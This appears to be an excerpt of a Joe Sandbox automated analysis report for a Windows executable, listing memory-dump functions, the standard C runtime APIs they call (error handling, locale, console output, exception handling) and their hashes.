                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 002E59CB
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2112829910-0
                                                                                                                                                                                                                                                              • Opcode ID: 460923f25ce4296cfd63c77326b7270b1e49ff84b9ce1e69306a5e5f9252f0c6
                                                                                                                                                                                                                                                              • Instruction ID: 1f48b044949f1601c4ffe7959d5ab811a511e408c1484d6da30993cee8a39809
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 460923f25ce4296cfd63c77326b7270b1e49ff84b9ce1e69306a5e5f9252f0c6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98D19A75D20698DFCF04CFA9D884AEDBBB4EF09314F68412AE456EB352D730A951CB90
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AdjustPointer
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1740715915-0
                                                                                                                                                                                                                                                              • Opcode ID: 658b4876bea9a8bece07b5456c8f78c4c70d40f2c6fa2f9dfd32a3ad49077d6f
                                                                                                                                                                                                                                                              • Instruction ID: 7508105dad1cf9dd037a3bb7f9d80bff8d6eb5cd26942ed3ab0832ff7998bea6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 658b4876bea9a8bece07b5456c8f78c4c70d40f2c6fa2f9dfd32a3ad49077d6f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63511472625A02AFDB299F14C851BBAB7B4EF01310F14442FE8459B391E772ED60CB90
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 002DE641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,002DFDE8,?,00000000,-00000008), ref: 002DE6A2
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 002E359B
                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 002E35A2
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 002E35DC
                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 002E35E3
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1913693674-0
                                                                                                                                                                                                                                                              • Opcode ID: e50b4a45cdd8fb6f85df15119e229c821dca05e76dd51bcf7510ee618eba07dd
                                                                                                                                                                                                                                                              • Instruction ID: a109dceeea9d27e67086711e5c5a6e3990b4992cbd98b9deea1c9ab22f638f5b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e50b4a45cdd8fb6f85df15119e229c821dca05e76dd51bcf7510ee618eba07dd
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D21F871660646AFCB20EF679849C3BB7A9FF48366780452AF825C7300D770EE208B90
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 929e6d463bfb7db297ff9c73ae39dd9194e9aba8ed78476ff8a5b256be128e98
                                                                                                                                                                                                                                                              • Instruction ID: bb92230aac6ea879449eb8413a664cc60f0d71df103d3b3744d931b866fb1133
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 929e6d463bfb7db297ff9c73ae39dd9194e9aba8ed78476ff8a5b256be128e98
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD21C031220206AFDB20AF65DC80D6B77A9EF40365720452BF929D7751EF75EC348BA1
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 002E4857
                                                                                                                                                                                                                                                                • Part of subcall function 002DE641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,002DFDE8,?,00000000,-00000008), ref: 002DE6A2
                                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002E488F
                                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002E48AF
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 158306478-0
                                                                                                                                                                                                                                                              • Opcode ID: f39d6de2a733e77b3b0bcd01df69b1fdccde9836478a8910e807ce6762092b0e
                                                                                                                                                                                                                                                              • Instruction ID: 14dd32e43b212b907e2bea945ec9a66c96d45165281d0b7acba626ee770d9ec6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f39d6de2a733e77b3b0bcd01df69b1fdccde9836478a8910e807ce6762092b0e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C1104B55362E57F6A11BBB6AC8DC7F295CDE853E4B510435F40195200FAA4CE20DAB1
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 002D4582
                                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 002D458C
                                                                                                                                                                                                                                                                • Part of subcall function 002D24C2: std::_Lockit::_Lockit.LIBCPMT ref: 002D24DE
                                                                                                                                                                                                                                                                • Part of subcall function 002D24C2: std::_Lockit::~_Lockit.LIBCPMT ref: 002D24F7
                                                                                                                                                                                                                                                              • codecvt.LIBCPMT ref: 002D45C6
                                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 002D45FD
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3716348337-0
                                                                                                                                                                                                                                                              • Opcode ID: e3d1235c629150daef9d7e1de543a0ad59b632253d41787322a47b923589bc11
                                                                                                                                                                                                                                                              • Instruction ID: c1fd286e0c9b11209082af178d6cae17f79d03bfd09885344e680500c230bbaf
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3d1235c629150daef9d7e1de543a0ad59b632253d41787322a47b923589bc11
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C01AD75920129CBCB05FFA4A819ABD7765FFA0320F24050AE412AB391CF749E25CB91
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,002E9B0F,00000000,00000001,00000000,?,?,002E5A1F,?,00000000,00000000), ref: 002EA4F7
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,002E9B0F,00000000,00000001,00000000,?,?,002E5A1F,?,00000000,00000000,?,?,?,002E5365,00000000), ref: 002EA503
                                                                                                                                                                                                                                                                • Part of subcall function 002EA554: CloseHandle.KERNEL32(FFFFFFFE,002EA513,?,002E9B0F,00000000,00000001,00000000,?,?,002E5A1F,?,00000000,00000000,?,?), ref: 002EA564
                                                                                                                                                                                                                                                              • ___initconout.LIBCMT ref: 002EA513
                                                                                                                                                                                                                                                                • Part of subcall function 002EA535: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,002EA4D1,002E9AFC,?,?,002E5A1F,?,00000000,00000000,?), ref: 002EA548
                                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,002E9B0F,00000000,00000001,00000000,?,?,002E5A1F,?,00000000,00000000,?), ref: 002EA528
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2744216297-0
                                                                                                                                                                                                                                                              • Opcode ID: 727944f96ff06d92e81c9188ed2cac8712f48506d790ed9547c2f88a064d1f15
                                                                                                                                                                                                                                                              • Instruction ID: 8ce1ab84c76488bed10d885c8e1b283137c5ec33716ccc56feae70e881ad0486
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 727944f96ff06d92e81c9188ed2cac8712f48506d790ed9547c2f88a064d1f15
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BFF01C36460259BFCF225F96FC0C9AA3F26FB883B0B814120FA0985220D6329930DB91
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 002D59B9
                                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 002D59C8
                                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 002D59D1
                                                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 002D59DE
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                                                              • Opcode ID: 9d46b41c90b297b21baea1c6700646a5710685773bd36c740a1a73f018d137b2
                                                                                                                                                                                                                                                              • Instruction ID: 12cfc8c66f420e227a8301eed41e508074536da3a5f5285ce270c47a8a06026e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d46b41c90b297b21baea1c6700646a5710685773bd36c740a1a73f018d137b2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46F06274D1120DEBCB00DBB5D94999EFBF4FF1C254BA145A6A412E7110E770AB44DF50
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 002DE783: GetLastError.KERNEL32(00000000,?,002E0AB9), ref: 002DE787
                                                                                                                                                                                                                                                                • Part of subcall function 002DE783: SetLastError.KERNEL32(00000000,?,?,00000028,002DB9D2), ref: 002DE829
                                                                                                                                                                                                                                                              • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,002D9266,?,?,?,00000055,?,-00000050,?,?,?), ref: 002E21D6
                                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,002D9266,?,?,?,00000055,?,-00000050,?,?), ref: 002E220D
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                                              • String ID: utf8
                                                                                                                                                                                                                                                              • API String ID: 943130320-905460609
                                                                                                                                                                                                                                                              • Opcode ID: 8e2c94edc282cfe4eff7defbdd5bc2f7b60a8e52da91dd6ca211003f58590244
                                                                                                                                                                                                                                                              • Instruction ID: 8dd69d196dd7643202ef7c4011179ab7f1a9d8a4a5d9f396618fa9cd0cd03c09
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e2c94edc282cfe4eff7defbdd5bc2f7b60a8e52da91dd6ca211003f58590244
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE513F71AE0386E5D724AF778C45FA673ACEF45700F900465FA0BDB181E6B0D9788A71
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,002DDEAD,?,?,00000000,00000000,00000000,?), ref: 002DDFD1
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: EncodePointer
                                                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                                                              • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                              • Opcode ID: e2f3ba338d8c8f48d9d5b56e511b9c2022fc12cd5a98d042d5da18f19324d8ee
                                                                                                                                                                                                                                                              • Instruction ID: 82c408be42883bf368475cb2e992f17d696a0c4cd007251863ecadad66e1eae0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2f3ba338d8c8f48d9d5b56e511b9c2022fc12cd5a98d042d5da18f19324d8ee
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B413971910209AFCF25EF94DC81AAEBBB5AF48305F19805AF904BB251D3B59D60DF50
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 002DDA8F
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                                                              • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                                              • Opcode ID: 42e8589ea5f7cd4ad6df6225e816f30960658cbe85e44b76217f230309c6d0e5
                                                                                                                                                                                                                                                              • Instruction ID: 4799ce4ff32207b7957ed43d24a978545b40245d213e9aaa818e720d0259f6ce
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42e8589ea5f7cd4ad6df6225e816f30960658cbe85e44b76217f230309c6d0e5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF310736560A49DBCF229F50CC44AAA7B69FF0836DB1A815BFC544A321D332DC71DB91
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002D4B74
                                                                                                                                                                                                                                                              • ___raise_securityfailure.LIBCMT ref: 002D4C5C
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
